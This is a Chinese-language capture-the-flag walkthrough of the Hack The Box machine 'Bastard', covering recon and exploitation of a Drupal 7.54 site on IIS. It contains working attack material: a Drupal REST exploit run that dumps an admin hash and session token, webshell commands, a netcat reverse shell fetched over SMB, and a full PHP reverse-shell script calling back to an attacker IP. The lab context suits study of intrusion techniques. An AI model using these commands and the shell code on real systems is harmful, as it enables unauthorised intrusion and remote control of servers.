Recon
TCP
80,135,49154
UDP
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-title: Welcome to Bastard | Bastard |_http-server-header: Microsoft-IIS/7.5 |_http-generator: Drupal 7 (http://drupal.org) 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windo
版本和操作系统扫描,这是台Windows靶机,看一下80端口是一个drupal的程序,再次验证一下
http://10.10.10.9:80 [200 OK] Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.9], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Microsoft-IIS[7.5], PHP[5.3.28,], PasswordField[pass], Script[text/javascript], Title[Welcome to Bastard | Bastard], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.3.28, ASP.NET]
robots.txt
文件列举出了一些目录User-agent: * Crawl-delay: 10 # CSS, JS, Images Allow: /misc/*.css$ Allow: /misc/*.css? Allow: /misc/*.js$ Allow: /misc/*.js? Allow: /misc/*.gif Allow: /misc/*.jpg Allow: /misc/*.jpeg Allow: /misc/*.png Allow: /modules/*.css$ Allow: /modules/*.css? Allow: /modules/*.js$ Allow: /modules/*.js? Allow: /modules/*.gif Allow: /modules/*.jpg Allow: /modules/*.jpeg Allow: /modules/*.png Allow: /profiles/*.css$ Allow: /profiles/*.css? Allow: /profiles/*.js$ Allow: /profiles/*.js? Allow: /profiles/*.gif Allow: /profiles/*.jpg Allow: /profiles/*.jpeg Allow: /profiles/*.png Allow: /themes/*.css$ Allow: /themes/*.css? Allow: /themes/*.js$ Allow: /themes/*.js? Allow: /themes/*.gif Allow: /themes/*.jpg Allow: /themes/*.jpeg Allow: /themes/*.png # Directories Disallow: /includes/ Disallow: /misc/ Disallow: /modules/ Disallow: /profiles/ Disallow: /scripts/ Disallow: /themes/ # Files Disallow: /CHANGELOG.txt Disallow: /cron.php Disallow: /INSTALL.mysql.txt Disallow: /INSTALL.pgsql.txt Disallow: /INSTALL.sqlite.txt Disallow: /install.php Disallow: /INSTALL.txt Disallow: /LICENSE.txt Disallow: /MAINTAINERS.txt Disallow: /update.php Disallow: /UPGRADE.txt Disallow: /xmlrpc.php # Paths (clean URLs) Disallow: /admin/ Disallow: /comment/reply/ Disallow: /filter/tips/ Disallow: /node/add/ Disallow: /search/ Disallow: /user/register/ Disallow: /user/password/ Disallow: /user/login/ Disallow: /user/logout/ # Paths (no clean URLs) Disallow: /?q=admin/ Disallow: /?q=comment/reply/ Disallow: /?q=filter/tips/ Disallow: /?q=node/add/ Disallow: /?q=search/ Disallow: /?q=user/password/ Disallow: /?q=user/register/ Disallow: /?q=user/login/ Disallow: /?q=user/logout/
CHANGELOG.txt
Drupal 7.54
启动一个python虚拟环境(requirements.txt),运行droopescan对该drupal进行扫描,交叉确认版本信息
source myenv/bin/activate droopescan scan drupal -u 10.10.10.9
searchsploit Drupal 7. --explude="metasploit"
搜一下利用,过滤掉meatsploit的结果
试试这个利用,改一下参数
Dirsearch工具扫描一下目录,找一下endpoint信息(这一步gobuster和dirsearch都没扫出来,可能是响应时间长被误判为了超时)
sudo dirsearch -u 10.10.10.9 -e php -x 404,403,503 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/rest目录为endpoint path
修改exploit
报错
sudo apt install php-curl
php 41654.php
通过exploit生成的.json文件
cat session.json { "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913", "session_id": "FuUzYilXylyDizRuDO4GlFk1KJYex8rdmxg-fysmSRw", "token": "ESwqLuDU-RigQ3D099IosfBJ28eJ7xwnEilfwKq27iI" }
cat user.json { "uid": "1", "name": "admin", "mail": "drupal@hackthebox.gr", "theme": "", "created": "1489920428", "access": "1492102672", "login": 1694421083, "status": "1", "timezone": "Europe\/Athens", "language": "", "picture": null, "init": "drupal@hackthebox.gr", "data": false, "roles": { "2": "authenticated user", "3": "administrator" }, "rdf_mapping": { "rdftype": [ "sioc:UserAccount" ], "name": { "predicates": [ "foaf:name" ] }, "homepage": { "predicates": [ "foaf:page" ], "type": "rel" } }, "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE" }
这一部分出现了两个有价值的信息,session token和admin用户的hash密码
验证太慢了,换一个方式,试试直接连接刚刚exploit上传的webshell (ivan.php)
curl http://10.10.10.9/ivan.php?ivan=whoami curl http://10.10.10.9/ivan.php?ivan=systeminfo
nt authority\iusr
sudo wget https://github.com/vinsworldcom/NetCat64/releases/download/1.11.6.4/nc64.exe
sudo python /usr/share/doc/python3-impacket/examples/smbserver.py share .
http://10.10.10.9/ivan.php?ivan=\\10.10.16.6\share\nc64.exe -e cmd.exe 10.10.16.6 1234
尝试Cookie session
<?php set_time_limit (0); $VERSION = "1.0"; $ip = '10.10.16.13'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = '//10.10.16.13/share/nc64.exe -e cmd.exe 10.10.16.13 443'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>
提权